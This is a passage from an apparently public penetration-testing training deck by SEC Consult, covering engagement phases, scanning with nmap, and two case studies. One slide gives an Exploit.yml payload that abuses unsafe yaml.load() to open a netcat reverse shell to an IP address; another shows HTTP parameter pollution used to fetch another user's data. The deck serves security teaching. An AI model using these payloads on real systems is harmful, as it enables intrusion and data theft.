Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 21 Who should conduct Pentest for your system? Someone within the company that uses the system • IT support, network / system engineer • Programmer, software tester Hire IT security specialist into the company • Security engineer • Penetration tester External security consultant firms • Penetration tester • SEC Consult (。◕‿◕。) PCI DSS Penetration Testing Guidance: Qualified internal resources or a qualified third party may perform the penetration test as long as they are organizationally independent. This means the penetration tester must be organizationally separate from the management of the target systems.
22.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 22 My Experience on Security Certificates
23.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 23 Checkpoint #1 ü What is Penetration Testing? (also called Pentest) ü Attack on a Computer System! ü OWASP Top 10 (WebApp) ü Pentest a Website: The Outcome ü Vulnerability in Standard Software ü Risk, Vulnerability and Exploit ü Sample Exploit Code ü Importance of Penetration Testing ü Who should conduct Pentest for your system? ü My Experience on Security Certificates
24.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 24 I want a Pentest https://twitter.com/coffeetocode/status/794593057282859008
25.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 25 Vulnerability Assessment (VA) Network VA scanners • Nexpose • Nessus • Qualys WebApp VA scanners • Acunetix • IBM AppScan • HP WebInspect
26.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 26 Types of Penetration Testing Blackbox Pentest • IP in the scope Greybox Pentest • App user, VPN user • User manual Whitebox Pentest • Source code • SSH and/or RDP access • Network diagram • Detailed documents
27.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 27 Blackbox Pentest in Action Hack Me Please.
28.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 28 Methodologies and Standards • OWASP Testing Guide *** • Open Source Security Testing Methodology Manual (OSSTMM) • Penetration Testing Execution Standard (PTES) • PCI DSS Penetration Testing Guidance *** • NIST Guideline on Network Security Testing (special publ. 800-42) • NIST SP800-115 : Technical Guide to Information Security Testing and Assessment (NIST Special Publication 800-115) • OWASP Top Ten (Wep App / Mobile App) *** • CWE/SANS Top 25 Most dangerous software errors *** • Durchfuehrungskonzept fuer Penetrationstests (BSI - Germany) • ÖNORM A 7700 (standard for webapp security in Austria)
29.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 29 Checkpoint #2 ü I want a Pentest ü Vulnerability Assessment (VA) ü Types of Penetration Testing ü Blackbox Pentest in Action ü Methodologies and Standards
30.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 30 Activities in a Penetration Testing Project 1) Pre-engagement 2) Engagement 3) Post-engagement • Schedule • Scoping • Rules of engagement • Formal permission • Contract points • Penetration Testing • Reporting • Remediation • Retesting identified vulnerabilities • Cleaning up the Environment
31.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 31 Pre-engagement: The Boring Stuff • Scoping • Success Criteria • Target systems • Documentation • User credentials • Network diagram • Formal permission to attack • Identified vulnerabilities in the past • Rules of engagement • Schedule, time window • Method of communication • Contact points • Disable IPS, WAF? • How to handle sensitive data? • Systems that may have issues with security scanners? • List of all IP addresses from which testing will originate?
32.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 32 Engagement: The Five Phases of Hacking 1. Reconnaissance • Passive info. gathering 2. Scanning • Active info. gathering • Host discovery • Port scan • VA scan 3. Gaining Access • Exploit the vulnerability 4. Maintaining Access 5. Covering Tracks
33.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 33 Engagement: Reconnaissance (Passive) Passive information gathering: • The information obtained from the customer • Open source intelligence (OSINT) • Company websites • Search engine (Google, Bing) • Social media (Facebook, Twitter, Linkedin) • Qualification in recruitment sites (jobsdb) • Software vendor • Web footer, HTML comments, credit in CSS/JS files • Metadata from publicly available files • DOC, XLT, PDF, JPG • Email, email headers • Physical locations, list of employees • The customer in news
34.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 34 Engagement: Reconnaissance (Passive)
35.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 35 Engagement: Reconnaissance (Passive)
36.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 36 Engagement: Scanning (Active) Automated tools or manual: • Interact with the system • Host discovery (nmap) • Port scan (nmap) • Network sniffing (Wireshark) • Social engineering (phone call, phishing email) • Vulnerability scan (Nessus, Nexpose) On-site information gathering: • Physical security inspections • Wireless scanning • Accessible facilities • Dumpster driving • Types of equipment in use
37.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 37 Engagement: Scanning (Active) $ sudo nmap 192.168.99.101 $ sudo nmap -Pn -n -p 1-65535 192.168.99.101 --open -sV -O
38.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 38 Engagement: Scanning (Active)
39.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 39 Engagement: Scanning (Active)
40.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 40 Checkpoint #3 ü Activities in a Penetration Testing Project ü Pre-engagement: The Boring Stuff ü Engagement: The Five Phases of Hacking ü Engagement: Reconnaissance (Passive) ü Google ü Shodan ü Engagement: Scanning (Active) ü Nmap ü Nessus [… To be continued…] • Engagement: Gaining Access • Post-engagement: …
41.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 41 Engagement: Gaining Access (Sample Vulnerabilities) Attack application layer Attack network layer • SQL injection • Insecure data storage • Broken authentication • Broken session management • Lack of network segmentation • Missing ARP spoofing detection • Missing SYN flood attack detection • Weak wireless encryption
42.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 42 Engagement: Exploitation Check all the open ports - UDP/TCP
43.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 43 Engagement: Exploitation (OWASP Testing Guide) Google: ”OWASP Testing Guide”
44.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 44 Engagement: Post-exploitation • Privilege Escalation • Pivoting https://www.exploit-db.com/exploits/39719/
45.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 45 Post-engagement: The Boring stuff #2 • Reporting • Remediation • Retesting identified vulnerabilities • Cleaning up the Environment
46.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 46 Post-engagement: Reporting Guideline • Executive Summary • Brief high-level summary of the penetration test scope and major finding • Statement of Scope • Statement of Methodology • Statement of Limitations • Testing Narrative • Document any issues encountered during testing • Segmentation Test Results • Finding • Risk raking/severity of each vulnerability • Description of finding • Tools Used • Cleaning up the Environment Post-penetration Test • Provide directions on how clean up should be performed PCI DSS – Penetration Testing Guidance
47.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 47 Engagement: Case Study #1
48.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 48 Engagement: Case Study #1 @app.route('/', methods=['GET', 'POST']) def upload_file(): if request.method == 'POST': if 'file' not in request.files: flash('No file part') return redirect(request.url) file = request.files['file'] raw_content = file.read() content = yaml.load(raw_content) return yaml.dump(content) yaml.load()
49.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 49 Engagement: Case Study #1 https://stackoverflow.com/questions/1773805/how-can-i-parse-a-yaml-file-in-python 1 2
50.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 50 Engagement: Case Study #1
51.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 51 Engagement: Case Study #1 File: Exploit.yml some_option: !!python/object/apply:subprocess.call args: [nc 192.168.213.170 1234 -e /bin/bash] kwds: {shell: true}
52.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 52 Engagement: Case Study #2 3rd party Mobile App Critical Systems 3rd party Dispatcher Server 3rd party DB/Auth Server Internet Isolated Network
53.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 53 Engagement: Case Study #2 3rd party Mobile App 3rd party Dispatcher Server 3rd party DB/Auth Server POST /userInfo Host: 3rdparty token= <3rdparty-token> POST /userInfo Host: customer userId=1234 Internet Data for the authorized user (1234) Critical Systems Isolated Network
54.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Critical Systems Isolated Network 54 Engagement: Case Study #2 3rd party Mobile App 3rd party Dispatcher Server 3rd party DB/Auth Server POST /userInfo Host: 3rdparty token= <3rdparty-token> &aaa=bbb POST /userInfo Host: customer userId=1234&aaa=bbb Internet Data for the authorized user (1234)
55.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Critical Systems Isolated Network 55 Engagement: Case Study #2 3rd party Mobile App 3rd party Dispatcher Server 3rd party DB/Auth Server POST /userInfo Host: 3rdparty token= <3rdparty-token> &userId=1235 POST /userInfo Host: customer userId=1234& userId=1235 Internet Data for the authorized user (1235)
56.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 56 Engagement: Case Study #2 https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_(OTG-INPVAL-004)
57.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 57 How to become a Penetration Tester? My Path: - Join security communities in Thailand (2600 Thailand, OWASP Thailand Chapter, TISA, CITEC) - Practice.. practice.. and practice ! - Share what you learn ! - Join the hacking competitions + Capture the Flag games
58.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 58 How to become a Penetration Tester? https://goo.gl/8cLyPY
59.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 59 Find security consultant firms in Thailand https://goo.gl/N9DkGM
60.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 60 Contact GERMANY SEC Consult Unternehmensberatung Deutschland GmbH Bockenheimer Landstraße 17-19 60325 Frankfurt / Main Tel +49 69 175 373 43 | Fax +49 69 175 373 44 Email office-frankfurt@sec-consult.com AUSTRIA SEC Consult Unternehmensberatung GmbH Mooslackengasse 17 1190 Vienna Tel +43 1 890 30 43 0 | Fax +43 1 890 30 43 15 Email office@sec-consult.com LITHUANIA UAB Critical Security, a SEC Consult company Sauletekio al. 15-311 10224 Vilnius Tel +370 5 2195535 Email office-vilnius@sec-consult.com RUSSIA CJCS Security Monitor 5th Donskoy proyezd, 15, Bldg. 6 119334, Moscow Tel +7 495 662 1414 Email info@securitymonitor.ru SINGAPORE SEC Consult Singapore PTE. LTD 4 Battery Road #25-01 Bank of China Building Singapore (049908) Email office-singapore@sec-consult.com CANADA i-SEC Consult Inc. 100 René-Lévesque West, Suite 2500 Montréal (Quebec) H3B 5C9 Email office-montreal@sec-consult.com AUSTRIA SEC Consult Unternehmensberatung GmbH Komarigasse 14/1 2700 Wiener Neustadt Tel +43 1 890 30 43 0 Email office@sec-consult.com THAILAND SEC Consult (Thailand) Co.,Ltd. 29/1 Piyaplace Langsuan Building 16th Floor, 16B Soi Langsuan, Ploen Chit Road Lumpini, Patumwan | Bangkok 10330 Email office-vilnius@sec-consult.com www.sec-consult.com
Baixar agora